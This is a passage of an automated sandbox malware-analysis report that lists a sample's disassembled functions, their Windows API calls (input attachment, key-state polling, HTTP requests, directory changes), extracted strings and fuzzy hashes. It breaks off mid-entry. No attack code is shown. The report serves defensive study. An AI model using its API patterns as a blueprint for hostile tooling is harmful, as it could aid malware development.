                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      • Opcode ID: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
                                                                      • Instruction ID: b4eeceaf1d7bd6579d85cc5f923f8ac2ab372f432cd680dcc2090afdca353b87
                                                                      • Opcode Fuzzy Hash: 56417462e8bf20dea9c42a0982086e09edca03589b54e2656f7db7e444426a52
                                                                      • Instruction Fuzzy Hash: 5661D070608361AFD310DF64D888F6EB7E8EF49714F10081AF9959B691C774EE88CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C18195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00C18257
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C18267
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C18273
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18310
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18324
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18356
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C1838C
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                      • String ID: *.*
                                                                      • API String ID: 1464919966-438819550
                                                                      • Opcode ID: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
                                                                      • Instruction ID: db47ca176db92781213603e950349ff63ab42132d4214fbf9331bb1952778c32
                                                                      • Opcode Fuzzy Hash: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
                                                                      • Instruction Fuzzy Hash: 2C616D725083059FC710EF64C894A9EB3E8FF8A310F44495EF99997251DB31EA49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C13388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C133CF
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C133F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-3080491070
                                                                      • Opcode ID: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
                                                                      • Instruction ID: fa734f54c6a6f440d89afe2d3a662f897c2285270a598ed646b78e15d0336db3
                                                                      • Opcode Fuzzy Hash: 61aa95ccb2b92f4d6ac7cb587e04580246b10f35c881e766e11b36a00f189374
                                                                      • Instruction Fuzzy Hash: 05518071904209ABDF15EBE0CD82EEEB7B9EF05744F1440A5F505720A2EB356F98EB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 1256254125-769500911
                                                                      • Opcode ID: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
                                                                      • Instruction ID: 4c4633b5693e491ebeae6250010b5ba8571c6f3b62d3f4c17522c494d4d0fcc1
                                                                      • Opcode Fuzzy Hash: 726205dacb0cfaf4e4c7ea22065479c7317ef5c43fbf3cb29f9394cc6ae435e9
                                                                      • Instruction Fuzzy Hash: 6241A432A001279ACB24DF7DC8905BEB7B5AFA1B54B244229F435DB2C4E732CE81C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C15393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C153A0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C15416
                                                                      • GetLastError.KERNEL32 ref: 00C15420
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00C154A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
                                                                      • Instruction ID: d7dbd440e434990d6d84e4907832d8a9b83b4c0e2a907faf1cf1262b18f7fbff
                                                                      • Opcode Fuzzy Hash: f851b0d210584cb2336e87ace9407193d97a7cf0fa761997607df05348d8b56b
                                                                      • Instruction Fuzzy Hash: 9A318D75A00604DFCB10DF68C484BEEBBB4EB86305F148065E415DB292DB71DEC6EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C33A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C33A9D
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C33AA0
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C33AC7
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C33AEA
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C33B62
                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00C33BAC
                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00C33BC7
                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00C33BE2
                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00C33BF6
                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00C33C13
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
                                                                      • Instruction ID: 7ff0a6847835e24355496c08d36167552d68ba840139c4702cb4886d08a1140f
                                                                      • Opcode Fuzzy Hash: 0ca7c9c4e4904eb8534fb0fc0ab503d31b6529b2e965f9b4eafb2f35c97bfdc5
                                                                      • Instruction Fuzzy Hash: 00617A75900248AFDB11DFA8CC81FEEB7F8EB09714F144199FA15A72A1C774AE81DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00C0A1E1,?,00000001), ref: 00C0B151
                                                                      • GetForegroundWindow.USER32 ref: 00C0B165
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00C0B16C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00C0B17B
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0B18D
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0B1A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00C0B1B8
                                                                      • AttachThreadInput.USER32(00000000,00000000), ref: 00C0B1FD
                                                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00C0B212
                                                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 00C0B21D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 5f313fcc12dd882cbb45eda731a08a60e92a70f55696d0b4da75d5e2ba6cc197
                                                                      • Instruction ID: 347dfba4e476cece57e1e5f35bedfb7d50ee6a6deab1f17a71642c00cbd9d280
                                                                      • Opcode Fuzzy Hash: 5f313fcc12dd882cbb45eda731a08a60e92a70f55696d0b4da75d5e2ba6cc197
                                                                      • Instruction Fuzzy Hash: 2C31AB71510204BFDB10DF24DC89BAE7BB9BB61711F108409FA29E62D0D7B89E80CF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BD2C94
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BD2CA0
                                                                      • _free.LIBCMT ref: 00BD2CAB
                                                                      • _free.LIBCMT ref: 00BD2CB6
                                                                      • _free.LIBCMT ref: 00BD2CC1
                                                                      • _free.LIBCMT ref: 00BD2CCC
                                                                      • _free.LIBCMT ref: 00BD2CD7
                                                                      • _free.LIBCMT ref: 00BD2CE2
                                                                      • _free.LIBCMT ref: 00BD2CED
                                                                      • _free.LIBCMT ref: 00BD2CFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 2ca4d75b11bf072d374b0c52c4608eac82a33add5edcf8275f10e3010c34d907
                                                                      • Instruction ID: fb7a87aa778442165bf61b72f21b847dcd549a0afc34707516f07539d131cc4d
                                                                      • Opcode Fuzzy Hash: 2ca4d75b11bf072d374b0c52c4608eac82a33add5edcf8275f10e3010c34d907
                                                                      • Instruction Fuzzy Hash: B411A47A100148AFCB02EF54D892CDDBBA5FF15350F4144A6FA489F322EA35EE50AB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BA1459
                                                                      • OleUninitialize.OLE32 ref: 00BA14F8
                                                                      • UnregisterHotKey.USER32(?), ref: 00BA16DD
                                                                      • DestroyWindow.USER32 ref: 00BE24B9
                                                                      • FreeLibrary.KERNEL32(?), ref: 00BE251E
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BE254B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: 5e02c1d4ce2d21ab3039c960f2ebdc5954c7237c8d0d73dfa662b549494e4603
                                                                      • Instruction ID: 72e37986d66f2f7beafa3f3cdf0458d02782c1b2ba25820020cce362db8d3ac6
                                                                      • Opcode Fuzzy Hash: 5e02c1d4ce2d21ab3039c960f2ebdc5954c7237c8d0d73dfa662b549494e4603
                                                                      • Instruction Fuzzy Hash: F8D147717052528FCB19EF19C999A69F7E4BF06700F1546EDE44AAB252CB30AD12CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32 ref: 00BA5C7A
                                                                        • Part of subcall function 00BA5D0A: GetClientRect.USER32 ref: 00BA5D30
                                                                        • Part of subcall function 00BA5D0A: GetWindowRect.USER32(?,?), ref: 00BA5D71
                                                                        • Part of subcall function 00BA5D0A: ScreenToClient.USER32(?,?), ref: 00BA5D99
                                                                      • GetDC.USER32 ref: 00BE46F5
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BE4708
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00BE4716
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00BE472B
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00BE4733
                                                                      • MoveWindow.USER32(?,?,?,?,?,?), ref: 00BE47C4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: 64acd5e2da4083ffe0021c1bf883849b483acebacf5ed3077e1258ccff667d29
                                                                      • Instruction ID: 8452f54488eec2a4442c97241c8e8175c56bf108d01ea65fc0ce1faacf5afcf8
                                                                      • Opcode Fuzzy Hash: 64acd5e2da4083ffe0021c1bf883849b483acebacf5ed3077e1258ccff667d29
                                                                      • Instruction Fuzzy Hash: 9271FD30404245EFCF218F65C984AAE7BF5FF4A320F1842E9ED565A2AAC7319D81DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00C135E4
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • LoadStringW.USER32(00C72390,?,00000FFF,?), ref: 00C1360A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      • Opcode ID: edd39ef11c7e80d9e3984bef36e88a24573a22e40a5cf295791e4689c00cfa33
                                                                      • Instruction ID: 37781cfc86b801d781115f02b5d366ceb4c6ead135f02b8a91cce6c8d44f7a23
                                                                      • Opcode Fuzzy Hash: edd39ef11c7e80d9e3984bef36e88a24573a22e40a5cf295791e4689c00cfa33
                                                                      • Instruction Fuzzy Hash: 80518F71804249ABDF14EBA0CC82EEEBBB4EF05344F084165F515721A2EB301BD9EFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C38B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                        • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                                        • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB9183
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB919D
                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00C38B6B
                                                                      • ImageList_EndDrag.COMCTL32 ref: 00C38B71
                                                                      • ReleaseCapture.USER32 ref: 00C38B77
                                                                      • SetWindowTextW.USER32 ref: 00C38C12
                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C38C25
                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00C38CFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 1924731296-2107944366
                                                                      • Opcode ID: a2347fb42a8c88022e72bbcba38c8af231e74de3af3b9bb477bb33af0172c3b5
                                                                      • Instruction ID: 4a09a0bbef16721c231b1223e4610f9e0500be8558a0a9da1ead2df16e67a8d3
                                                                      • Opcode Fuzzy Hash: a2347fb42a8c88022e72bbcba38c8af231e74de3af3b9bb477bb33af0172c3b5
                                                                      • Instruction Fuzzy Hash: 89518A71118300AFD714DF24DC96FAE77E4FB88754F000669F996A72E1DB70AA48CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C29A
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C2CA
                                                                      • GetLastError.KERNEL32 ref: 00C1C322
                                                                      • SetEvent.KERNEL32(?), ref: 00C1C336
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: d99c11a14377d03f8b51ed6d09c8955a9d96fba440a1545c9c527939d2734898
                                                                      • Instruction ID: 43c373ca05f8a833bd47568cf31d34750a4522ad20b8cc30b9639c473c7b76f7
                                                                      • Opcode Fuzzy Hash: d99c11a14377d03f8b51ed6d09c8955a9d96fba440a1545c9c527939d2734898
                                                                      • Instruction Fuzzy Hash: 7F317FB1540604AFD7219F658CC8BEF7BFCEB4A744B50851DF466E2210DB34DD84AB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
